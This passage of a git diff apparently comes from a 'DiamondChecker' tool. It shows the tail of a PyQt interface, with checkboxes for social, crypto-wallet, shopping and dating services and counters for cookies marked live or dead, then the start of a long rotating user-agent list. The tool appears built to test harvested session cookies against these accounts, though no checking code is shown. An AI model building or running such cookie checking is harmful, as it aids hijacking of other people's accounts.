"Pintrest")) + self.checkBox_youtube.setText(_translate("MainWindow", "YouTube")) + self.vimeo_checkbox.setText(_translate("MainWindow", "Vimeo")) + self.rumble_checkbox.setText(_translate("MainWindow", "Rumble")) + self.localsapp_checkbox.setText(_translate("MainWindow", "Locals")) + self.snapchat_checkbox.setText(_translate("MainWindow", "Snapchat")) + self.patreon_checkbox.setText(_translate("MainWindow", "Patreon")) + self.checkBox_netflix.setText(_translate("MainWindow", "Netflix")) + self.checkBox_vk.setText(_translate("MainWindow", "VK")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.social_network_tab), _translate("MainWindow", "Social network")) + self.checkBox_coinbase.setText(_translate("MainWindow", "CoinBase")) + self.checkBox_kryptex.setText(_translate("MainWindow", "Kryptex")) + self.checkBox_hitbtc.setText(_translate("MainWindow", "HitBTC")) + self.checkBox_freebitcoin.setText(_translate("MainWindow", "FreeBitcoin")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.crypto_wallets_tab), _translate("MainWindow", "Crypto wallet")) + self.checkBox_amazon.setText(_translate("MainWindow", "Amazon")) + self.ebay_checkbox.setText(_translate("MainWindow", "Ebay")) + self.airbnb_checkbox.setText(_translate("MainWindow", "AirBNB")) + self.envato_checkbox.setText(_translate("MainWindow", "Envato Elements")) + self.flipkart_checkbox.setText(_translate("MainWindow", "Flipkart")) + self.checkBox_funpay.setText(_translate("MainWindow", "FunPay")) + self.kleinanzeigen_checkbox.setText(_translate("MainWindow", "Kleinanzeigen")) + self.booking_checkbox.setText(_translate("MainWindow", "Booking.com")) + self.uber_eats_checkbox.setText(_translate("MainWindow", "Uber Eats")) + self.dh_gate_checkbox.setText(_translate("MainWindow", "DH Gate")) + self.checkBox_humble.setText(_translate("MainWindow", "Humble")) + self.temu_checkbox.setText(_translate("MainWindow", "Temu")) + self.fiverr_checkbox.setText(_translate("MainWindow", "Fiverr")) + self.zillow_checkbox.setText(_translate("MainWindow", "Zillow")) + self.instacart_checkbox.setText(_translate("MainWindow", "Instacart")) + self.google_play_checkbox.setText(_translate("MainWindow", "Google Play")) + self.vinted_checkbox.setText(_translate("MainWindow", "Vinted")) + self.walmart_checkbox.setText(_translate("MainWindow", "Walmart")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.shopping_tab), _translate("MainWindow", "Shop")) + self.ashley_madison_checkbox.setText(_translate("MainWindow", "AshleyMaddison")) + self.zoosk_checkbox.setText(_translate("MainWindow", "Zoosk")) + self.meetme_checkbox.setText(_translate("MainWindow", "MeetMe")) + self.eharmony_checkbox.setText(_translate("MainWindow", "EHarmony")) + self.tinder_checkbox.setText(_translate("MainWindow", "Tinder")) + self.christan_mingle_checkbox.setText(_translate("MainWindow", "ChristanMingle")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.daiting_tab), _translate("MainWindow", "Daiting")) + self.number_of_label.setText(_translate("MainWindow", "Number of:")) + self.files_label.setText(_translate("MainWindow", "Files:")) + self.folders_label.setText(_translate("MainWindow", "Folders:")) + self.cookies_label.setText(_translate("MainWindow", "Cookies:")) + self.cookie_stats_label.setText(_translate("MainWindow", "Cookie Stats:")) + self.live_label.setText(_translate("MainWindow", "Live:")) + self.dead_label.setText(_translate("MainWindow", "Dead:")) + self.errors_label.setText(_translate("MainWindow", "Errors:")) + + +if __name__ == "__main__": + import sys + app = QtWidgets.QApplication(sys.argv) + MainWindow = QtWidgets.QMainWindow() + ui = Ui_MainWindow() + ui.setupUi(MainWindow) + MainWindow.show() + sys.exit(app.exec_()) diff --git a/DiamondChecker/useragents.txt b/DiamondChecker/useragents.txt index cc2d65d..5a8a8d5 100644 --- a/DiamondChecker/useragents.txt +++ b/DiamondChecker/useragents.txt @@ -1,477 +1,477 @@ -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 